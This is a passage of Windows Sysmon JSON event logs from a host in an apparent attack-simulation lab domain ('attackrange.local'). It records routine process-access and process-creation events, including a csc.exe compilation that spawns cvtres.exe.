06:55:15.212","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5379,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.212\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.212","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5380,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.212\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.212","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5381,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.212\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.212","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5382,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.212\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-001089BB0700}\r\nSourceProcessId: 2892\r\nSourceThreadId: 3144\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001090DE0700}\r\nTargetProcessId: 4108\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.212","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001089BB0700}","SourceProcessId":"2892","SourceThreadId":"3144","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001090DE0700}","TargetProcessId":"4108","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5383,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.313\r\nProcessGuid: {E2A3D6B1-11D3-5F25-0000-00107FE20700}\r\nProcessId: 4924\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESDE71.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSCFE180FFE14B455B8D28AAA44C654E7.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D2-5F25-0000-0020BBBA0700}\r\nLogonId: 0x7BABB\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {E2A3D6B1-11D3-5F25-0000-001090DE0700}\r\nParentProcessId: 4108\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\u3qddcyv.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.313","ProcessGuid":"{E2A3D6B1-11D3-5F25-0000-00107FE20700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESDE71.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSCFE180FFE14B455B8D28AAA44C654E7.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D2-5F25-0000-0020BBBA0700}","LogonId":"0x7babb","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{E2A3D6B1-11D3-5F25-0000-001090DE0700}","ParentProcessId":"4108","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\u3qddcyv.cmdline\"","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5384,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.306\r\nSourceProcessGUID: {E2A3D6B1-11D3-5F25-0000-001090DE0700}\r\nSourceProcessId: 4108\r\nSourceThreadId: 3308\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-00107FE20700}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.306","SourceProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001090DE0700}","SourceProcessId":"4108","SourceThreadId":"3308","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-00107FE20700}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5385,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.306\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-00107FE20700}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.306","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-00107FE20700}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5386,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.306\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 